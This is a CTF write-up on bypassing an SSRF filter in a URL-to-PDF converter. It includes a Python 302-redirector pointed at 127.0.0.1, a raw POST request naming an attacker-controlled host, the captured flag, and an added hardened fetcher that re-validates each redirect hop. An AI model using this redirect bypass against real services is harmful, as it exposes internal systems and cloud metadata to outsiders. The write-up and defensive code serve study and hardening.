This challenge involved a website that allowed users to specify a URL to
render as a PDF. This essentially acts as a way to perform SSRF. However, any
address such as `127.0.0.1`, or other encoded forms of it, is rejected.

To get around this, we simply use redirect headers on our own server: the
filter only inspects the URL that was submitted, while the renderer follows
whatever redirect that URL returns. I reused this [code
snippet](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery#bypass-via-redirect):

```python
#!/usr/bin/env python3

# Usage: python3 ./redirector.py 8000 http://127.0.0.1/

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv) - 1 != 2:
    print("Usage: {} <port_number> <url>".format(sys.argv[0]))
    sys.exit(1)


class Redirect(BaseHTTPRequestHandler):
    # Answer every GET with a 302 whose Location is the URL given on the command line
    def do_GET(self):
        self.send_response(302)
        self.send_header('Location', sys.argv[2])
        self.end_headers()


# Listen on all interfaces on the port given on the command line
HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()
```

This was invoked with `python redirector.py 80 http://127.0.0.1`.

The following request was sent to the challenge server to trigger the redirect
to localhost.

```
POST /convert HTTP/1.1
Host: 143.244.132.186:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Origin: http://143.244.132.186:3000
Connection: close
Referer: http://143.244.132.186:3000/
Upgrade-Insecure-Requests: 1

target=http://attacker.sg.pwn
```

The resultant PDF document that gets rendered contains:

```
Welcome back to home admin! Here is your Flag: VULNCON{W3lc0me_b4ck_t0_h0m3}
```

**Flag:** `VULNCON{W3lc0me_b4ck_t0_h0m3}`
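The bypass works because the challenge validated only the submitted URL and then let the PDF renderer follow the 302 on its own. The following is an added example, not part of the original writeup or the challenge code, showing that vulnerable pattern (`naive_fetch`) next to the hardened form (`safe_fetch`), which re-validates the destination of every redirect hop, resolves hostnames and rejects loopback, private, link-local, IPv4-mapped and other non-public addresses. The DNS table, the HTTP responses and the IP `93.184.216.34` for `attacker.sg.pwn` are constructed stand-ins so the code runs offline; `system_resolve` is what a real deployment would pass instead.

```python
import ipaddress
import socket
from urllib.parse import urljoin, urlparse

MAX_REDIRECTS = 5
REDIRECT_CODES = {301, 302, 303, 307, 308}


def system_resolve(host):
    """Every address the system resolver returns for host (IP literals pass through)."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}


def is_public_ip(ip_text):
    """True only for globally routable addresses. Loopback, RFC 1918, link-local
    (169.254/16, where cloud metadata services live), multicast, reserved and
    unspecified ranges all fail, as do IPv4-mapped IPv6 forms of them."""
    try:
        ip = ipaddress.ip_address(ip_text.split("%")[0])  # drop an IPv6 zone id
    except ValueError:
        return False
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped  # check ::ffff:127.0.0.1 as 127.0.0.1
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def validate_url(url, resolve=system_resolve):
    """Check scheme and resolved host of one URL; returns (ok, reason)."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https"):
        return False, "scheme %r not allowed" % parsed.scheme
    host = parsed.hostname
    if not host:
        return False, "missing host"
    try:
        addrs = resolve(host)
    except OSError:  # socket.gaierror is a subclass of OSError
        return False, "cannot resolve %s" % host
    for addr in addrs:
        if not is_public_ip(addr):
            return False, "%s resolves to non-public address %s" % (host, addr)
    return True, "ok"


def naive_fetch(url, fetch, resolve=system_resolve):
    """The challenge's pattern: validate the submitted URL once, then follow
    redirects without looking at where they point. fetch(url) -> (status, headers, body)."""
    ok, reason = validate_url(url, resolve)
    if not ok:
        return None, "blocked: " + reason
    status, headers, body = fetch(url)
    hops = 0
    while status in REDIRECT_CODES and "Location" in headers and hops < MAX_REDIRECTS:
        url = urljoin(url, headers["Location"])
        status, headers, body = fetch(url)  # new destination is never checked
        hops += 1
    return body, "ok"


def safe_fetch(url, fetch, resolve=system_resolve):
    """Hardened form: every hop is validated before it is requested."""
    for _ in range(MAX_REDIRECTS + 1):
        ok, reason = validate_url(url, resolve)
        if not ok:
            return None, "blocked: " + reason
        status, headers, body = fetch(url)
        if status in REDIRECT_CODES and "Location" in headers:
            url = urljoin(url, headers["Location"])
            continue
        return body, "ok"
    return None, "blocked: too many redirects"


# Constructed stand-ins for DNS and HTTP so the example runs offline.
FAKE_DNS = {"attacker.sg.pwn": {"93.184.216.34"}, "localhost": {"127.0.0.1"}}
FAKE_HTTP = {
    "http://attacker.sg.pwn": (302, {"Location": "http://127.0.0.1/"}, b""),
    "http://127.0.0.1/": (200, {}, b"Welcome back to home admin!"),
}


def fake_resolve(host):
    try:
        ipaddress.ip_address(host)
        return {host}  # IP literal: nothing to resolve
    except ValueError:
        pass
    if host not in FAKE_DNS:
        raise socket.gaierror("constructed NXDOMAIN for " + host)
    return FAKE_DNS[host]


def fake_fetch(url):
    return FAKE_HTTP.get(url, (404, {}, b"not found"))


def demo():
    """Run the same submitted URL through both fetchers."""
    return {
        "naive": naive_fetch("http://attacker.sg.pwn", fake_fetch, fake_resolve),
        "safe": safe_fetch("http://attacker.sg.pwn", fake_fetch, fake_resolve),
        "direct": safe_fetch("http://127.0.0.1/", fake_fetch, fake_resolve),
    }


if __name__ == "__main__":
    for name, (body, status) in demo().items():
        print(name, status, body)
```

Validating each hop closes the redirect bypass, but note that `validate_url` resolves the name separately from the request that the HTTP client will make; a resolver that answers differently on the second lookup (DNS rebinding) still gets through, so a production renderer should also pin the connection to the address it validated, or run the renderer in a network namespace with no route to internal ranges at all.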

Original writeup (https://nandynarwhals.org/vulncon-ctf-2021/#website-shot).